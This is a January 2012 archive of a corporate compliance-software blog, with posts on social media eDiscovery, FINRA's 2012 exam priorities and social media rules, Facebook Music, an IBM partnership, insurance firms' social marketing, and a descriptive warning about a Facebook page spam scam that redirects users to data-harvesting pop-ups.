Monthly Archives: January 2012

Let’s not forget social media in discovery strategies

By nleong,   January 25, 2012

Up until very recently, social media eDiscovery was often overlooked (or just plain ignored) by law firms and organizations alike.  That’s changing though.  With an increase in case law emerging on social media issues, it was inevitable that the legal community would start to incorporate social media communications into their discovery strategies.

The recent  sanction of an attorney in Virginia underscored the importance courts now place on proper discovery of social media content.  At the end of the day, social media is just another form of electronic communication, much along the lines of email and instant messaging.  It’s the content that matters, not the communication channel.  In fact, whether it’s for corporate governance, regulatory, or eDiscovery purposes, the identification and collection of social media content is absolutely critical.

I’m excited to present at LegalTech New York this year.  Social is on everyone’s minds.  Case law is growing on the topic.  And technology is keeping pace.  In addition to speaking in New York, I’ll also be hosting a regular webinar on social media eDiscovery.  We’ll be hosting our first Social Media eDiscovery webinar on February 8th at 11am PT, so we encourage you to sign up and find out what your organization should be doing with respect to social and what tools are available to facilitate the discovery process.

Social’s not going anywhere, so it’s best to be prepared if the courts get involved….

Facebook Page Spam: Misuse of “Static html: iframe tabs”

By actiance,   January 24, 2012

Facebook has connected millions of people around the world.  The social connector has become not only a medium for sharing but also a platform for third parties to nurture their businesses based on applications and games.  Facebook pages, in addition, lets its users advertise their businesses among folks across the globe.  Facebook pages (sponsored stories and ads) have become one of the best ways to spread the word about a business.

Popularity has its own side effects.  The useful Facebook pages and applications have been misused by spammers, and the innocent public has to suffer.  We came across a Facebook Page scam that was misusing the static html: iframe tabs to trick users.

The spammer creates a Facebook page:

When a user comes across this page, “Loading” is displayed and then the page redirects to a pop-up.  The redirection here is done using Facebook static html: iframe tabs.  This is a useful tool that lets Facebook application developers build iframe tabs for pages.

The network traffic suggests

A useful Facebook application is being used here for malicious purposes by the spammer.

It is evident from the code (see Image1) that a redirection is happening to ‘’ using http POST method.  Spammers are using the domain, adding a subdirectory, ‘’ and then further redirection is happening (see Image2).


Like ‘,’ ‘’ is also compromised and being used for further redirection to pop-ups, adding a subdirectory ‘’ and here again, encrypted information is sent to a compromised server using http POST method.


See Image3 for initial pop-up that is brought using the domains (,,, etc.)


If you are not from the U.S., the pop-up will further redirect you to another pop-up specifically for you (see Image4).


Eventually, the user is led to an ad page that looks something similar to Image5.


If you are not from the U.S., then you are led to an ad page that looks similar to Image6.  It strengthens the idea that the spammer is using local servers based on territory to render ad pages.


The page is showing as if you are the luckiest person on earth.  That is when the spammers ask for personally identifiable information, such as your e-mail address, zip code, mobile number, and other basic information.

The notable thing here is that the spammer is navigating pages using the single iframe URL.

Intention of attack

I have not experienced anything wrong with my Facebook account after observing the spam page. However, I’m concerned about the encrypted data that was sent to compromised servers.  The user’s e-mail address and mobile numbers could also be used for future spamming.

The type of spam is a warning sign:  Facebook users and third-party application developers alike must be on the lookout for similar pages used to trick innocent users.

Social media eDiscovery Webinar

By Sarah Carter,  

It’s a new year, yet the social media train continues along its tracks.  As social becomes further ingrained in our daily lives, both personally and professionally, the legal community is quickly realizing that social media cannot be ignored for eDiscovery.  Increasingly, we’re seeing more lawsuits that are social media-related.  Although it’s a still-evolving area of law, the body of case law is steadily growing.

Actiance is excited to announce a new webinar series focused on social media eDiscovery.  You’ll learn about eDiscovery basics and what’s driving corporations and law firms alike to think seriously about their social media strategies.  We’ll discuss some of the key drivers for social media discovery and the technology solutions available to capture this type of content.

Our very own, Norv Leong, will be delivering the webinar.  He’s a licensed member of the California Bar and is also the author of the Actiance white paper, “Social Media and Litigation:  Outlining eDiscovery Issues.”  He’ll bring to bear his twelve years of experience in the technology and legal sectors to educate you on the key issues of social media eDiscovery and to share his insights on an effective social discovery strategy.

We believe that social cannot be overlooked for any organization’s overall discovery strategy, so please join us on February 8th at 11am PT to find out why. Register at

Belbey Blogs: Rick Ketchum, Chairman of FINRA, Highlights FINRA Exam Priorities for 2012

By Joanna Belbey,   January 19, 2012

At the  SIFMA Compliance and Legal Monthly Luncheon held at the Harvard Club in New York on January 17, Richard Ketchum, Chairman and Chief Executive Officer of FINRA outlined exam priorities for 2012.

Mr. Ketchum acknowledged that these difficult markets, the search for yield, and the changing regulatory landscape due to the implementation of Dodd Frank can place “tremendous pressures” on firms, clients, and Compliance departments.  But, at the end of the day, the mission of FINRA is to protect investors.  He stated that he hoped that his remarks before the group of mostly attorneys and other compliance professionals would “ get your blood running, if not running cold,” as he encouraged everyone to “step up” to meet compliance challenges and respond  in an honest way to the lessons we’ve learned over the last few years.

In the next few weeks, FINRA will release its Annual Exam Priority Letter.  The following are a few advance highlights:

Complex Products – Heightened supervision is required with enhanced compliance procedures to ensure that reps, supervisors, and retail investors understand complex products.  See Regulatory Notice 12-03 for details.

Supervision – Firms must demonstrate responsibility for all business lines they engage in, in spite of increased difficulty, complexity, and customer frustrations with return on investments.  Firms must demonstrate proper supervision.

Suitability – Changes to FINRA “Know your customer” Suitability are rules going into effect July 9th. Examiners will review the steps firms are taking to prepare for changes and implementation once rules are in effect.  See Regulatory Notice 11-25 for details.

Data Security – In light of sophisticated attacks against firms, FINRA is looking for equally significant defenses, including attention to emerging markets.

Social Media – FINRA has issued two notices, Regulatory Notice 10-06 Guidance on Blogs and Social Networking Web Sites and Regulatory Notice 11-39 Guidance on Social Networking Websites and Business Communications.  Examiners will focus on the supervision and recordkeeping of all business communications, regardless of device; the pre-approval of static content; supervision of interactive content on a risk basis; and the adoption and entanglement of third-party content resulting in a firm being responsible for that content.  Furthermore, FINRA examiners will check whether a registered principal of the firm has reviewed social media sites before they are launched; if there are links to third-party sites with false or misleading content; that firms have established policies to ensure the accuracy of third-party data feeds; and when firms allow the use of personal devices, they must demonstrate the ability to supervise and keep records of those business communications.

Mr. Ketchum noted that FINRA welcomes continued feedback from the industry on any and all issues and is looking forward to a three-way conversation  - specifically about social media and FINRA, the industry, and the SEC — that sets so much of the record-keeping requirements in the industry.

So, watch for FINRA’s Annual Exam Priority Letter soon and continue to take a careful look at how your firm is complying with FINRA rules, including following FINRA’s guidance on social media.  And consider writing a letter to Mr. Ketchum and FINRA to share your key learnings as you begin to deploy social media within your enterprise.

Feeling the emotion with Facebook Music

By actiance,   January 18, 2012

Music – the true sense of sharing

Millions of people have been availing the services of social giant, Facebook, to connect and share with others across the globe.  Facebook has connected people through features such as wall updates, photos, videos, chat, etc.  These features have helped folks make connections worldwide, and eventually, build up a huge network of friends.  Although users receive several notifications from others commenting and liking their posts, photos, videos, etc., it never really has created a sense of “closeness” among people.

One may find many friends available to chat online, but then why is it that they rarely, if ever, chat?  It could be that they have nothing to say or don’t really know each other (just because you’re “Facebook friends” doesn’t necessarily mean you’re “friends friends,” right?).

Perhaps Facebook has realized that, even though they’re providing a platform for which to connect and share, it isn’t enough to actually bring people closer together emotionally.  Additional effort is needed to truly connect people on an emotional level, which opens up  whole new ballgame for sharing.  And what could be more powerful than music.

Music evokes a range of emotions – from pain to euphoria.  It doesn’t matter if you’re in the US, Europe, India, Asia, Australia…the world over loves music and oftentimes relies on it to lift one’s spirits when feeling down or in need of that adrenalin rush just before a sporting event, an important exam, or before proposing to your sweetheart.  It’s essentially a medium through which to share your innermost feelings – a more powerful and purer type of “sharing” than, say, the sharing of forced-smile photos or contrived/stolen wall updates.

Music is from the heart and represents Facebook’s next foray into the next dimension of sharing.  It could very well end up being an avenue for users to spend even more time on Facebook.

Partial rollout of Facebook Music

Users can find the “Music” tab under the “Apps” category on the home page or can be found here.

The page lists a number of trending albums.  The user can view artist names, album titles, and third-party music providers (e.g.,  Spotify, MySpace, Saavn).  When a user clicks on a song, a pop-up window appears that prompts the user to add the specific provider’s app, after which the user is directed to that provider’s site.  And because the pop-up here is not really a Facebook application, but rather, a redirection to a third-party page, it is not asking for any user information like other Facebook applications.

This partial rollout confirms that Facebook will not directly host or stream any music content and that it will rely on third-party providers to do so.  Facebook’s plan is to become a platform for music content in the same way it’s a platform for apps and games.  This contrasts with Google and Apple’s strategies of hosting music on their own servers.

Whispers are circulating that Facebook might go beyond Music.  For instance, Netflix could stream movies through Facebook or there could be an application that uploads music to the cloud.  The possibilities are endless.

Right now, though, I’m just anxiously awaiting the complete rollout of Facebook Music so that I can listen to music with my friends and share real emotions.

Actiance and IBM: Enabling Social Business

By nleong,   January 17, 2012

Most of the Actiance team is off at Lotusphere this week – and while I expect a few of them will be sneaking away from the show floor early to visit the “Magic Kingdom,” I’ve been left to captain the ‘blogging ship’ as it were.  So, as a nod to the Actiance team at Lotusphere and to longtime Actiance partner, IBM, I wanted to write about some great news for IBM Connections users and Actiance customers.

At the event, Actiance is showcasing the result of a partnership with IBM – Vantage for IBM Connections.

When most people think about what the term “social business” means, they typically don’t think regulatory compliance and eDiscovery.  But, businesses moving into social face increased regulatory compliance requirements.  Add in the requirement that social content needs to be discoverable and suddenly the internal IT team is in over its head trying to make social business work.

That’s why Actiance has partnered with IBM to make it easier for IBM customers to adopt social collaboration tools.  IBM customers can now access Vantage Compliance support for IBM Connections and IBM Sametime through the IBM Passport Advantage (PPA).

Vantage for IBM Connections provides a centralized governance, management, and security policy framework to ensure compliant, discoverable social content (it also allows granular policies to be defined between end users, groups of employees, and even non-employees).

I know the team is excited to showcase our new Vantage for IBM Connections compliance module (available exclusively through IBM) at Lotusphere this year.  We’ve already seen a tremendous amount of interest in the module from customers looking to better enforce corporate use policies and enable collaboration.

If you’re attending Lotusphere this year, please stop by Actiance booth #521 – we’d love to hear about what your organization is doing to enable social business.  If you have questions about Vantage for IBM Connections – let us know in the comments section below – we always enjoy talking social business!

Belbey Blogs: FINRA is NOT backing off social media

By Joanna Belbey,   January 6, 2012

In recent weeks, there has been some confusion about FINRA’s stance on social media.  Between one source and another, it seems as if there’s a general feeling that FINRA is “backing off” from social media.  We don’t agree.  We’re going to attempt to clarify FINRA’s position, but first, some context.

Since the consolidation of NASD and the regulatory function of NYSE in 2007, the newly established entity, FINRA, has worked towards creating a new, consolidated FINRA Rulebook.  The goal is to harmonize and streamline existing rules (from NYSE and NASD), adapt to the changes in the securities industry, and create a set of rules that are flexible enough to be used across different types of firms regulated by FINRA.

As FINRA has clearly stated that social media is just another form of electronic communications and should be treated as such, firms are closely watching FINRA’s progress on the consolidation of rules that impact social media, such as supervision, bookkeeping, and communications.

In July 2011, FINRA filed proposed changes to Communications with the Public rules with the Securities Exchange Commission.  Since then, there have been two rounds of comments from the industry with FINRA submitting the final proposal for changes on December 22, 2011, to the SEC.  The SEC is accepting comments from the industry until January 18, 2012, and will comment on the proposed rule sometime after that.

The issue that has everyone talking within social media circles begins on page 10 of the December 22nd letter.  The current NASD Rule 2210 specifies six types of communications, with different regulatory requirements for each.  One category, “Public Appearance,” used for “participation in a seminar, forum (including an electronic forum), radio or television interview” was where FINRA originally classified interactive posts on social media.  That meant that firms were responsible for supervising such activities to ensure compliance with content standards and maintain appropriate records but were not required to file these posts with the FINRA Advertising Department.  (A sidenote for those of you unfamiliar with the regulatory process:  depending on how they are categorized, certain advertising and sales literature materials need to be both pre-approved by a registered principal of a firm and then sent to FINRA for review and approval.)

Under the new rule, however, FINRA Rule 2210 would be streamlined to have only three categories of communications and “Public appearance” would no longer be a separate category under communications.  Instead, FINRA has proposed categorizing social media as “Retail Communications,” which has a different set of regulatory requirements.  When the industry expressed concern that this would make using social media overly complicated for firms, FINRA specifically excluded posts on online interactive electronic forums from filing requirements.

However, it’s important to note that although social media may not be subject to filing requirements with the proposed rule, firms still need to ensure compliance with content standards and bookkeeping requirements like any other written communications.  That means that social media communications need to be captured, supervised, archived, and made available upon request.  Filing is not archiving after all, and a number of folks appear to have been confusing the two terms.

Backing off social media?  We don’t think so, especially when the SEC issues two alerts and charges a firm with the fraudulent use on LinkedIn in one day.  In fact, we think that the regulators will pay close attention to the use of social media in the coming year to demonstrate their commitment to protecting investors.

Are you ready?  We’re certainly standing by.  In fact, we’re planning on putting on a webinar once FINRA 2210 is finalized, so watch this space for details.  And feel free to contact us if you’d like to chat about your specific social media concerns in the meantime.

The insurance industry getting socially savvy

By nleong,   January 4, 2012

In looking back at 2011, the insurance industry was quite active on the social media front.  Firms of all sizes hopped on the social bandwagon.  From cavemen to ducks to Aaron Rodgers, marketing folks at insurance companies (both P&C and, to a lesser extent, life/health) were hard at work trying to engage with prospects and customers via social.  A study by SocialEyes revealed much about the state of the industry in its effort to exploit the benefits of this new marketing channel.

As social takes on a more strategic role in insurance firms (as opposed to a novelty), many firms (especially those that weren’t early adopters of social) are turning to marketing agencies for help in developing strategies and campaigns to lure new customers.  Central to any strategy is to create value in the content being posted to social networks like Facebook, LinkedIn, and Twitter.  With compelling content comes a higher likelihood of increased engagement with a particular prospect or customer.  This is why finding a top-notch marketing agency is so difficult:  it’s not as easy as you might think to find an agency well-versed in social but also possessing the domain expertise crucial to building impactful Facebook pages.

The nice thing about social is that it allows for much creativity.  For instance, 21st Century Insurance tripled its fanbase in just five months, running weekly sweepstakes with prizes like Macbooks.  Similarly, State Farm (in conjunction with its Aaron Rodgers ‘dance-off’ campaign) dangled a trip to the Super Bowl though its social media pages.  And finally, MetLife, leveraging its association with the Peanuts gang (Snoopy!!), noticed a higher level of interaction among its followers when an image of a Peanuts character was used, rather than no image at all.

In fact, when you see which firms are having the most success with social, it’s those firms that have between 10,000 and 100,000 Facebook friends, according to SocialEyes.  Firms in this segment are growing the fastest and tend to have enough resources, both internal and agency, to effectively leverage social.  The firms with more than a million fans tend to be focused on brand-building and not as interested in developing a meaningful dialogue.  Hence, pages with smaller fan counts tend to have higher rates of customer interactions, i.e., more sharing and commenting of content posted.

Interestingly, when it comes to Facebook page types, it was the product-focused pages that saw the fastest growth, not the mascot-type pages (think Aflac Duck, GEICO Caveman, Progressive “Discount!” Girl).  But, the catch here is that firms must work hard to keep the pages relevant and “sticky.”  Building a relationship with customers via social requires commitment and content on the part of the insurance provider.  Already, we’ve seen GEICO shift focus away from its motorcycle and RV product pages to other products.  Like most things social, it’s about responding to market dynamics and providing content “we the people” want to see.

On the Twitter front, insurance companies with more than 10,000 followers were the fastest growing segment, tweeting 3.5x as much as the firms with less than 1,000 followers.  Perhaps a combination of more resources plus the increased use of promoted tweets accounts for the delta between these two segments.  And then there’s the creative GEICO Gecko campaign that utilizes a multi-channel approach, i.e., leveraging both Facebook and Twitter, as consumers can track the Gecko’s journey across the US.  Through this integrated campaign, the number of Twitter followers has increased by 66%.

So, whether it’s cavemen, ducks, or geckos, insurance firms are using social in innovative ways.  Results can vary, but those who put in the effort per a carefully conceived strategy have been (and will continue to be) the ones reaping the most benefits.  At the end of the day, though, creating an experience that provides value to the consumer will ultimately be the measuring stick of a firm’s social strategy.